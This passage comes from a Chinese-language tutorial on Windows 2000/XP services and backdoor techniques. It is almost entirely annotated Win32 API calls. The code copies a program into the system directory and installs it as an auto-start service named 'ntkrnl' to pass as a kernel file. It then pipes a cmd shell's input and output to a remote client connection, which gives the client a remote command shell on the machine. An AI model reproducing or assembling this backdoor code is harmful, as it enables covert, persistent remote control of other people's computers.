|
浅析Windows 2000/XP服务与后门技术(3) //查找系统目录下服务程序的文件是否已经存在;
GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
//获得当前进程的程序文件名;
CopyFile(lpCurrentPath,lpImagePath,FALSE);
//复制文件到系统目录下;
schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_Access);
//打开服务控制管理器数据库;
CreateService(schSCManager,"ntkrnl","ntkrnl",
SERVICE_ALL_ACCESS,SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
"ntkrnl.exe",NULL,NULL,NULL,NULL,NULL);
//创建服务,参数包括名称,服务类型,开始类型,错误类型及文件路径等;
schService=OpenService(schSCManager,"ntkrnl",SERVICE_START);
//如果服务已经创建,则打开服务;
StartService(schService,0,NULL);
//启动服务进程;
ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus);
//控制服务状态;
DeleteService(schService);
//卸载服务程序;
DeleteFile(lpImagePath);
//删除文件;
3.后门程序相关函数
hMutex=CreateMutex(NULL,FALSE,NULL);
//创建互斥量;
hThread=CreateThread(NULL,0,CmdShell,(LPVOID)&sClient,0,NULL);
//创建处理客户端访问的重定向输入输出线程;
CreatePipe(&hReadPipe,&hReadShell,&saPipe,0);
CreatePipe(&hWriteShell,&hWritePipe,&saPipe,0);
//创建用于进程间通信的输入/输出管道;
CreateProcess(lpImagePath,NULL,NULL,NULL,TRUE,0,NULL,NULL,&lpStartupInfo,&lpProcessInfo);
//创建经重定向输入输出的Cmd进程;
hThread[1]=CreateThread(NULL,0,ReadShell,(LPVOID*)&sdRead,0,&dwSendThreadId);
hThread[2]=CreateThread(NULL,0,WriteShell,(LPVOID *)&sdWrite,0,&dwReavThreadId);
//创建处理Cmd输入输出的线程;
dwResult=WaitForMultipleObjects(3,hThread,FALSE,INFINITE);
//等待线程或进程的结束;
ReleaseMutex(hMutex);
//释放互斥量;
PeekNamedPipe(sdRead.hPipe,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL,NULL);
//从管道中复制数据到缓冲区中,但不从管道中移出;
ReadFile(sdRead.hPipe,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL);
//从管道中复制数据到缓冲区中;
WriteFile(sdWrite.hPipe,szBuffer2Write,dwBuffer2Write,&dwBufferWritten,NULL);
//向管道中写入从客户端接收到的数据;
|
